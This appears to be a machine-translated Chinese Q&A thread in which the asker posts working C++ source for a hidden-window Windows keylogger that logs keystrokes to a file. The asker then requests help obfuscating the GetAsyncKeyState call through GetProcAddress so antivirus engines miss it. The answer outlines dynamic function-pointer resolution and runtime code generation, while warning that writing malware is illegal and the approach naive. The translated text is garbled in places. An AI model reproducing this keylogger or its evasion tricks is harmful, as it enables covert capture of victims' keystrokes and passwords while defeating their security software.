我正在制作自己的源代码模糊处理程序,我注意到如果源代码中有这样的函数调用,一些防病毒引擎会检测到一个简单的键盘记录程序"GetASyncKeyState";。以这个源代码为例,它是一个简单的键盘记录程序主函数。
int main()
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
char KEY = 'x';
while (true) {
Sleep(10);
for (int KEY = 8; KEY <= 190; KEY++)
{
if (GetAsyncKeyState(KEY) == -32767) {
if (SpecialKeys(KEY) == false) {
fstream LogFile;
LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << char(KEY);
LogFile.close();
}
}
}
}
}
return 0;
}
我想混淆"的函数调用;GetAsyncKeyState";名称,以便没有AV可以将其检测为键盘记录程序。我对使用序数和GetProcAddress实现函数调用感到困惑。就像我在下面的代码中尝试过的那样。
typedef int(__cdecl *MYPROC)(LPWSTR);
int main(void)
{
HINSTANCE hinstLib;
MYPROC ProcAdd;
BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;
// Get a handle to the DLL module.
hinstLib = LoadLibrary(TEXT("user32.dll"));
// If the handle is valid, try to get the function address.
if (hinstLib != NULL)
{
ProcAdd = (MYPROC)GetProcAddress(hinstLib, "GetAsyncKeyState");
// If the function address is valid, call the function.
if (NULL != ProcAdd)
{
fRunTimeLinkSuccess = TRUE;
(ProcAdd)(L"Message sent to the DLL functionn Loaded Wao");
printf("Yahooo Function Called");
}
// Free the DLL module.
fFreeResult = FreeLibrary(hinstLib);
}
// If unable to call the DLL function, use an alternative.
if (!fRunTimeLinkSuccess)
printf("Message printed from executablen Not Worked Soory");
getch();
return 0; }
这种实施是不可理解的。请同时对此进行解释。
我只需要相当于";GetAsyncKeyState(Key(";以便我的模糊处理程序将检测到该函数调用,并将其替换为等效调用(Dynamically(,这样我就可以绕过静态分析检测。
我正在制作我自己的源代码模糊器
其中一些可以购买。一种实用的方法是改进一些现有的开源编译器(如GCC或Clang(,在其中添加模糊处理。使用GCC,您可以为此编写GCC插件(例如,借助Bismon静态分析器(。请注意许可问题(您的GCC插件可能需要是开源的;请咨询您的律师(。
一种可能的方法是元编程(另请参阅RefPerSys(。您可以编写(例如使用asmjit或libgccjit(一些C++代码,在运行时生成机器代码。
您的代码可以:,而不是调用GetAsyncKeyState
-
在初始化时(或不时定期(获得
GetAsyncKeyState的地址,并将其放入某个变量(某个函数指针(中 -
生成调用某些新函数
foo中的GetAsyncKeyState的机器代码 -
呼叫
foo
请与您的律师核实您想要的代码在您的国家/地区是否合法。在法国,编写恶意软件属于刑事犯罪。
还要注意Rice定理。
这样我就可以绕过静态分析检测。。。。
这是一种天真的观点。即使使用模糊处理,从技术上讲,可执行文件也可以通过BinSec等二进制分析工具进行逆向工程。
顺便说一句,写一个源代码混淆器可能比花钱请律师写一个好的EULA更贵。
相反的方法是使代码开源(当然,您需要得到经理或客户的批准(。见本报告草案中的参考文献。或者阅读(让你的经理阅读(开源的成功。让一些源代码开源有很多经济和技术上的原因:这篇论文(由诺贝尔奖得主Jean Tirole合著(解释了这些原因。阅读关于什么是免费软件。。。。
咨询律师
PS。对于与Bismon源静态分析器(如果提供额外资金,它可能会演变成一个scator代码(或BinSec二进制静态分析器有关的问题(2021年上半年(,请通过电子邮件basile.starynkevitch@cea.fr与我联系
注:。我个人对你的技术方法的看法是,它非常天真,不会保护你的专有软件免受严肃的二进制静态分析团队的攻击。